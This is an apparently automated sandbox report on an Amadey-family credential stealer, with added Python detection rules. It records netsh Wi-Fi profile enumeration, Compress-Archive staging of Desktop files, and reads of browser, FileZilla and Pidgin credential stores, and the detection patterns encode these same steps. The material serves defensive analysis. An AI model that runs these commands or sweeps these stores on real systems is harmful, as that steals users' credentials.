Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00B1E27A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 0_2_00B1E27A
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
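The process tree in this section is the detection-relevant part of the report: explorha.exe, the executable the sample drops to Temp, launches rundll32.exe on cred64.dll and clip64.dll from AppData\Roaming with the export Main (the DLLs the Yara rules below flag as Amadey's stealer and clipper), and that rundll32.exe in turn runs netsh wlan show profiles (the Sigma hit "Capture Wi-Fi password") and powershell Compress-Archive to stage the Desktop documents it read into a zip under Temp. The Python below is an added detection example, not part of the report: it encodes those three parent/child/command-line relationships as rules and runs them over constructed Sysmon-style process-creation events rebuilt from the lines above, plus two benign controls that are ours and must not fire. The severity bump on key=clear reflects how netsh reveals a stored PSK in general; the report shows only the profile enumeration step.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style: ParentImage, Image, CommandLine)
# rebuilt from the process tree in the report above. The last two are benign controls we added.
EVENTS = [
    {"parent": r"C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe",
     "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmd": r'"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main'},
    {"parent": r"C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe",
     "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmd": r'"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main'},
    {"parent": r"C:\Windows\System32\rundll32.exe",
     "image": r"C:\Windows\System32\netsh.exe",
     "cmd": "netsh wlan show profiles"},
    {"parent": r"C:\Windows\System32\rundll32.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal"},
    # benign controls (constructed): a control-panel applet launch and an interface listing
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r'"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\netsh.exe",
     "cmd": "netsh interface show interface"},
]

USER_WRITABLE = re.compile(r"\\(AppData|ProgramData|Users\\Public|Windows\\Temp)\\", re.I)
DLL_ARG = re.compile(r"(\S+\.dll)\s*,\s*\w+", re.I)   # "<path>.dll, Export" or "<path>.dll,Export"
INTERACTIVE_PARENTS = {"cmd.exe", "powershell.exe", "explorer.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def rule_rundll32_user_writable_dll(ev):
    """rundll32 executing an export from a DLL under a user-writable directory."""
    if basename(ev["image"]) != "rundll32.exe":
        return None
    m = DLL_ARG.search(ev["cmd"])
    if m and USER_WRITABLE.search(m.group(1)):
        return ("rundll32_dll_from_user_writable_path", "high")
    return None


def rule_wifi_profile_dump(ev):
    """netsh wlan profile enumeration; key=clear or a non-interactive parent raises severity."""
    if basename(ev["image"]) != "netsh.exe":
        return None
    cmd = ev["cmd"].lower()
    if "wlan" not in cmd or "show profile" not in cmd:
        return None
    severity = "medium"
    if "key=clear" in cmd or basename(ev["parent"]) not in INTERACTIVE_PARENTS:
        severity = "high"
    return ("netsh_wlan_profile_enumeration", severity)


def rule_rundll32_to_powershell_archive(ev):
    """rundll32 spawning PowerShell to archive data into Temp: collection staging."""
    if basename(ev["parent"]) != "rundll32.exe" or basename(ev["image"]) != "powershell.exe":
        return None
    if re.search(r"compress-archive", ev["cmd"], re.I) and re.search(r"\\Temp\\", ev["cmd"], re.I):
        return ("rundll32_spawns_powershell_staging_archive", "high")
    return None


RULES = [rule_rundll32_user_writable_dll, rule_wifi_profile_dump, rule_rundll32_to_powershell_archive]


def evaluate(events):
    """Run every rule over every event; return one finding per (event, rule) hit."""
    findings = []
    for i, ev in enumerate(events):
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append({"event": i, "rule": hit[0], "severity": hit[1], "cmd": ev["cmd"]})
    return findings


if __name__ == "__main__":
    for f in evaluate(EVENTS):
        print(f"[{f['severity']}] event {f['event']} {f['rule']}: {f['cmd']}")
```

The rules key on relationships rather than on hashes or the random directory names (09fd851a4f, a091ec0a6e2227), which change per build; the DLL path, the netsh parent and the rundll32-to-PowerShell archive chain are what a new Amadey sample would still have to reproduce.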

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

Stealing of Sensitive Information

Source: Yara match File source: 13.2.rundll32.exe.6e5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, type: DROPPED
Source: Yara match File source: 13.2.rundll32.exe.6e5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.explorgu.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.amert.exe.4a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorgu.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe.b00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.explorha.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.explorha.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.explorha.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001D.00000003.2889754714.0000000004920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.2562352728.0000000004920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1730374185.0000000000481000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2891590864.0000000000481000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1732891922.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1645556467.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2602620211.0000000000161000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2890551485.0000000000161000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2294672609.0000000004700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1746949833.0000000000481000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.2530989609.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1690165240.0000000004C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2897232652.000000006E5B1000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1706644741.0000000004C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2571487121.00000000004A1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED
Source: Yara match File source: 0000000E.00000002.2899511665.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.2754517007.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2438871880.0000000005320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2890860265.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2890561636.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2898506799.0000000000E31000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2440483320.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.2578285726.00000000056F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2495106365.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2890551261.00000000009A1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2890560740.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2393485516.0000000005340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2890907498.0000000000E31000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.2670876049.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2891741375.00000000009A1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ad0e9cf6d6.exe PID: 5904, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 2252, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 5796, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ad0e9cf6d6.exe PID: 7008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 6888, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ad0e9cf6d6.exe PID: 6052, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 3176, type: MEMORYSTR
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.json
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.json
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\oobe\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files (x86)\iryicPkAkDbGMYaxbGJHFHLYRIPerBQhGBmxioestlQZBCigBXWrqXelHzkVWCWICZDSbkfceIOIhu\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\09fd851a4f\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SysWOW64\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\.purple\accounts.xml
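Detection logic for the credential-access behaviour listed above, as an added example that is not part of the sandbox report and not code from the malware. It is a small Python rule set run over constructed, Sysmon-like event records modelled on the observations: rundll32.exe spawning `netsh wlan show profiles`, and the same rundll32.exe opening browser `Login Data` / `logins.json`, FileZilla `sitemanager.xml` and Pidgin `.purple\accounts.xml`. The record layout (`kind`, `pid`, `image`, `parent_image`, `command_line`, `target`), the PIDs, the owner allowlist, the LOLBin list and the sweep threshold are all assumptions for illustration.

```python
"""
Rules for the credential-access pattern seen in the report: a LOLBin
(rundll32.exe) enumerating Wi-Fi profiles via netsh and sweeping many
credential stores. Event records below are CONSTRUCTED for this example; the
field names are Sysmon-like assumptions, not a real log schema.
"""
import re
from collections import defaultdict

# Processes that legitimately read their own credential store (assumption: a
# production allowlist would key on full path and code signer, not basename).
STORE_OWNERS = {
    "chrome.exe", "msedge.exe", "firefox.exe", "opera.exe", "vivaldi.exe",
    "brave.exe", "filezilla.exe", "pidgin.exe",
}
# Script/DLL hosts that should never touch a credential store (assumption).
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Credential-store locations observed in the report.
STORE_PATTERNS = [
    re.compile(r"\\User Data\\[^\\]+\\Login Data$", re.I),            # Chromium family
    re.compile(r"\\Opera Software\\Opera Stable\\Login Data$", re.I),  # Opera keeps no 'User Data'
    re.compile(r"\\Mozilla\\Firefox\\Profiles\\(?:[^\\]+\\)?logins\.json$", re.I),
    re.compile(r"\\FileZilla\\sitemanager\.xml$", re.I),
    re.compile(r"\\\.purple\\accounts\.xml$", re.I),                   # Pidgin
]
WLAN_PROFILE_RE = re.compile(r"\bnetsh(?:\.exe)?\s+wlan\s+show\s+profiles?\b", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def is_credential_store(path):
    """True only for a full-path match; 'Login Data notes.txt' must not trip it."""
    return any(p.search(path) for p in STORE_PATTERNS)


def detect(events, sweep_threshold=3):
    """Return alerts as (rule, pid, severity, detail) in the order they fire."""
    alerts = []
    stores = defaultdict(set)  # (image basename, pid) -> distinct store paths opened
    for ev in events:
        img = basename(ev["image"])
        if ev["kind"] == "process_create":
            cmd = ev.get("command_line", "")
            if img == "netsh.exe" and WLAN_PROFILE_RE.search(cmd):
                parent = basename(ev.get("parent_image", ""))
                # 'show profiles' enumerates SSIDs; 'show profile <x> key=clear' dumps the PSK
                sev = "high" if "key=clear" in cmd.lower() else "medium"
                alerts.append(("wlan_profile_enum", ev["pid"], sev, f"{parent} -> {cmd}"))
        elif ev["kind"] == "file_open":
            path = ev["target"]
            if img in STORE_OWNERS or not is_credential_store(path):
                continue
            key = (img, ev["pid"])
            if img in LOLBINS and not stores[key]:
                # one read of a credential store by a LOLBin is enough on its own
                alerts.append(("lolbin_credential_access", ev["pid"], "high", f"{img} opened {path}"))
            stores[key].add(path)
    # Breadth rule: many distinct stores from one process is a stealer sweep
    for (img, pid), paths in stores.items():
        if len(paths) >= sweep_threshold:
            alerts.append(("credential_store_sweep", pid, "high", f"{img} touched {len(paths)} stores"))
    return alerts


# Constructed sample telemetry modelled on the report's observations (PIDs invented).
SAMPLE_EVENTS = [
    {"kind": "process_create", "pid": 6400, "image": r"C:\Windows\System32\netsh.exe",
     "parent_image": r"C:\Windows\System32\rundll32.exe", "command_line": "netsh wlan show profiles"},
    {"kind": "file_open", "pid": 5120, "image": r"C:\Windows\System32\rundll32.exe",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"kind": "file_open", "pid": 5120, "image": r"C:\Windows\System32\rundll32.exe",
     "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.json"},
    {"kind": "file_open", "pid": 5120, "image": r"C:\Windows\System32\rundll32.exe",
     "target": r"C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml"},
    {"kind": "file_open", "pid": 5120, "image": r"C:\Windows\System32\rundll32.exe",
     "target": r"C:\Windows\.purple\accounts.xml"},
    # benign: the browser reading its own store
    {"kind": "file_open", "pid": 3300, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    # benign: a document whose name merely contains the words
    {"kind": "file_open", "pid": 4100, "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\user\Documents\Login Data notes.txt"},
]

if __name__ == "__main__":
    for rule, pid, sev, detail in detect(SAMPLE_EVENTS):
        print(f"[{sev}] {rule} pid={pid}: {detail}")
```

Two caveats before reusing this. The `file_open` records assume object-access auditing (Security event 4663 with SACLs on the store files) or EDR file telemetry; Sysmon's event set records file creation, not reads. And allowlisting by image basename is weak: a stealer injected into chrome.exe would read `Login Data` under an allowed name, so the owner check should be tied to signer and install path, with the sweep rule kept as the backstop because the breadth (a dozen browsers plus FileZilla and Pidgin, and `accounts.xml` probed in unrelated directories) is what no single legitimate client produces.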

Remote Access Functionality

Source: Yara match File source: 0000000E.00000002.2899511665.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.2754517007.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2438871880.0000000005320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2890860265.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2890561636.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2898506799.0000000000E31000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2440483320.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.2578285726.00000000056F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2495106365.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2890551261.00000000009A1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2890560740.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2393485516.0000000005340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2890907498.0000000000E31000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.2670876049.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2891741375.00000000009A1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ad0e9cf6d6.exe PID: 5904, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 2252, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 5796, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ad0e9cf6d6.exe PID: 7008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 6888, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ad0e9cf6d6.exe PID: 6052, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 3176, type: MEMORYSTR